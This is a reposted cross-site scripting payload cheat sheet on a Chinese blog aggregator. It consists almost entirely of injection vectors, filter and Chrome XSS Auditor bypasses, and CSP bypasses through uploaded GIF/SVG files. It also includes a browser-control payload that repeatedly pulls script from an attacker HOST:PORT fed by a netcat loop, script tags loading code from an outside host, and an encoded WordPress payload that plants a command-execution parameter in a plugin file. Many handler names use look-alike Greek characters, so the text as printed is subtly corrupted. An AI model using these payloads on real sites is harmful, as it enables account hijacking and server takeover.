來自某牛的網站：http://www.cnblogs.com/b1gstar/p/5783848.html

?

Basic and advanced exploits?for XSS proofs and attacks.

Work in progress, bookmark it.

?

TechniqueVector/Payload ** In URLs:& => %26 , # => %23 , + => %2B

HTML Context? Tag Injection	<svg οnlοad=alert(1)> "><svg οnlοad=alert(1)//
HTML Context? Inline Injection	"οnmοuseοver=alert(1)// "autofocus/οnfοcus=alert(1)//
Javascript Context? Code Injection	'-alert(1)-' '-alert(1)//
Javascript Context? Code Injection (escaping the escape)	\'-alert(1)//
Javascript Context? Tag Injection	</script><svg οnlοad=alert(1)>
PHP_SELF Injection	http://DOMAIN/PAGE.php/"><svg οnlοad=alert(1)>
Without Parenthesis	<svg οnlοad=alert`1`> <svg οnlοad=alert&lpar;1&rpar;> <svg οnlοad=alert&#x28;1&#x29> <svg οnlοad=alert&#40;1&#41>
Filter Bypass? Alert Obfuscation	(alert)(1) a=alert,a(1) [1].find(alert) top["al"+"ert"](1) top[/al/.source+/ert/.source](1) al\u0065rt(1) top['al\145rt'](1) top['al\x65rt'](1) top[8680439..toString(30)](1)
Body Tag	<body οnlοad=alert(1)> <body οnpageshοw=alert(1)> <body οnfοcus=alert(1)> <body οnhashchange=alert(1)><a href=#x>click this!#x <body style=overflow:auto;height:1000px οnscrοll=alert(1) id=x>#x <body οnscrοll=alert(1)><br><br><br><br> <br><br><br><br><br><br><br><br><br><br> <br><br><br><br><br><br><br><br><br><br> <br><br><br><br><br><br><x id=x>#x <body οnresize=alert(1)>press F12! <body onhelp=alert(1)>press F1! (MSIE)
Miscellaneous Vectors	<marquee onstart=alert(1)> <marquee loop=1 width=0 onfinish=alert(1)> <audio src οnlοadstart=alert(1)> <video οnlοadstart=alert(1)><source> <input autofocus οnblur=alert(1)> <keygen autofocus οnfοcus=alert(1)> <form οnsubmit=alert(1)><input type=submit> <select οnchange=alert(1)><option>1<option>2 <menu id=x contextmenu=x οnshοw=alert(1)>right click me!
Agnostic Event Handlers	<x contenteditable οnblur=alert(1)>lose focus!? <x οnclick=alert(1)>click this!? <x οncοpy=alert(1)>copy this!? <x οncοntextmenu=alert(1)>right click this!? <x oncut=alert(1)>copy this!? <x οndblclick=alert(1)>double click this!? <x οndrag=alert(1)>drag this!? <x contenteditable οnfοcus=alert(1)>focus this!? <x contenteditable οninput=alert(1)>input here!? <x contenteditable οnkeydοwn=alert(1)>press any key!? <x contenteditable οnkeypress=alert(1)>press any key!? <x contenteditable οnkeyup=alert(1)>press any key!? <x οnmοusedοwn=alert(1)>click this!? <x οnmοusemοve=alert(1)>hover this!? <x οnmοuseοut=alert(1)>hover this!? <x οnmοuseοver=alert(1)>hover this!? <x οnmοuseup=alert(1)>click this!? <x contenteditable οnpaste=alert(1)>paste here!
Code Reuse Inline Script	<script>alert(1)//? <script>alert(1)<!–
Code Reuse? Regular Script	<script src=//brutelogic.com.br/1.js>? <script src=//3334957647/1>
Filter Bypass Generic Tag + Handler	Encoding? Mixed Case? Spacers? %3Cx onxxx=1? <%78 onxxx=1? <x %6Fnxxx=1? <x o%6Exxx=1? <x on%78xx=1? <x onxxx%3D1 <X onxxx=1? <x OnXxx=1? <X OnXxx=1? Doubling? <x onxxx=1 onxxx=1 <x/onxxx=1? <x%09onxxx=1? <x%0Aonxxx=1? <x%0Conxxx=1? <x%0Donxxx=1? <x%2Fonxxx=1? Quotes Stripping Mimetism <x 1='1'onxxx=1? <x 1="1"onxxx=1 <[S]x onx[S]xx=1 [S] = stripped char or string <x </onxxx=1? <x 1=">" onxxx=1? <http://onxxx%3D1/
Generic Source Breaking	<x onxxx=alert(1) 1='
Browser Control	<svg οnlοad=setInterval(function(){with(document)body.? appendChild(createElement('script')).src='//HOST:PORT'},0)>? $ while :; do printf "j$ "; read c; echo $c | nc -lp PORT >/dev/null; done
Multi Reflection	Double Reflection Single Input Single Input (script-based) 'οnlοad=alert(1)><svg/1=' '>alert(1)</script><script/1='? */alert(1)</script><script>/* Triple Reflection Single Input Single Input (script-based) */alert(1)">'οnlοad="/*<svg/1=' `-alert(1)">'οnlοad="`<svg/1=' */</script>'>alert(1)/*<script/1=' Multi Input Double Input Triple Input p=<svg/1='&q='οnlοad=alert(1)> p=<svg 1='&q='οnlοad='/*&r=*/alert(1)'>
Without Event Handlers	<script>alert(1)</script>? <script src=javascript:alert(1)>? <iframe src=javascript:alert(1)>? <embed src=javascript:alert(1)>? <a href=javascript:alert(1)>click? <math><brute href=javascript:alert(1)>click? <form action=javascript:alert(1)><input type=submit>? <isindex action=javascript:alert(1) type=submit value=click>? <form><button formaction=javascript:alert(1)>click? <form><input formaction=javascript:alert(1) type=submit value=click>? <form><input formaction=javascript:alert(1) type=image value=click>? <form><input formaction=javascript:alert(1) type=image src=SOURCE>? <isindex formaction=javascript:alert(1) type=submit value=click>? <object data=javascript:alert(1)>? <iframe srcdoc=<svg/o&#x6Eload&equals;alert&lpar;1)&gt;>? <svg><script xlink:href=data:,alert(1) />? <math><brute xlink:href=javascript:alert(1)>click? <svg><a xmlns:xlink=http://www.w3.org/1999/xlink xlink:href=?><circle r=400 /><animate attributeName=xlink:href begin=0 from=javascript:alert(1) to=&>
Mobile Only	Event Handlers <html ontouchstart=alert(1)>? <html ontouchend=alert(1)>? <html ontouchmove=alert(1)>? <html ontouchcancel=alert(1)> <body onorientatiοnchange=alert(1)> Javascript Properties Functions <svg οnlοad=alert(navigator.connection.type)>? <svg οnlοad=alert(navigator.battery.level)>? <svg οnlοad=alert(navigator.battery.dischargingTime)> <svg οnlοad=alert(navigator.battery.charging)> <svg οnlοad=navigator.vibrate(500)>? <svg οnlοad=navigator.vibrate([500,300,100])>
Generic Self to Regular XSS	<iframe src=LOGOUT_URL οnlοad=forms[0].submit()>? </iframe><form method=post action=LOGIN_URL>? <input name=USERNAME_PARAMETER_NAME value=USERNAME>? <input name=PASSWORD_PARAMETER_NAME value=PASSWORD>
File Upload	Injection in Filename "><img src=1 οnerrοr=alert(1)>.gif Injection in Metadata $ exiftool -Artist='"><img src=1 οnerrοr=alert(1)>' FILENAME.jpeg Injection with SVG File <svg xmlns="http://www.w3.org/2000/svg" οnlοad="alert(document.domain)"/> Injection with GIF File as Source of Script (CSP Bypass) GIF89a/*<svg/οnlοad=alert(1)>*/=alert(document.domain)//;
Google Chrome? Auditor Bypass? (up to v51)	<script src="data:&comma;alert(1)//? "><script src=data:&comma;alert(1)//? <script src="//brutelogic.com.br&sol;1.js&num;? "><script src=//brutelogic.com.br&sol;1.js&num;? <link rel=import href="data:text/html&comma;&lt;script&gt;alert(1)&lt;&sol;script&gt;? "><link rel=import href=data:text/html&comma;&lt;script&gt;alert(1)&lt;&sol;script&gt;
PHP File for? XHR Remote Call	<?php header(“Access-Control-Allow-Origin: *”); ?> <img src=1 οnerrοr=alert(1)>
Server Log Avoidance	<svg οnlοad=eval(URL.slice(-8))>#alert(1) <svg οnlοad=eval(location.hash.slice(1)>#alert(1) <svg οnlοad=innerHTML=location.hash>#<script>alert(1)</script>
Shortest PoC	<base href=//0> $ while:; do echo "alert(1)" | nc -lp80; done
Portable Wordpress RCE	<script/src="data:&comma;eval(atob(location.hash.slice(1)))//&num; #eD1uZXcgWE1MSHR0cFJlcXVlc3QoKQ0KcD0nL3dwLWFkbWluL3Bsd Wdpbi1lZGl0b3IucGhwPycNCmY9J2ZpbGU9YWtpc21ldC9pbmRleC5w aHAnDQp4Lm9wZW4oJ0dFVCcscCtmLDApDQp4LnNlbmQoKQ0KJD0n X3dwbm9uY2U9JysvY2UiIHZhbHVlPSIoW14iXSo/KSIvLmV4ZWMoeC 5yZXNwb25zZVRleHQpWzFdKycmbmV3Y29udGVudD08Pz1gJF9HRV RbYnJ1dGVdYDsmYWN0aW9uPXVwZGF0ZSYnK2YNCngub3BlbignUE 9TVCcscCtmLDEpDQp4LnNldFJlcXVlc3RIZWFkZXIoJ0NvbnRlbnQtVHl wZScsJ2FwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZCcpD Qp4LnNlbmQoJCk= http://DOMAIN/WP-ROOT/wp-content/plugins/akismet/index.php?brute=CMD

NOTICE: A special version of this cheat sheet (with private stuff) is available to@brutalsecrets?followers?here?(check pass on timeline).

#hack2learn

x000s'''

轉載于:https://www.cnblogs.com/nuomin/p/7063750.html

總結

以上是生活随笔為你收集整理的xss Payload的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。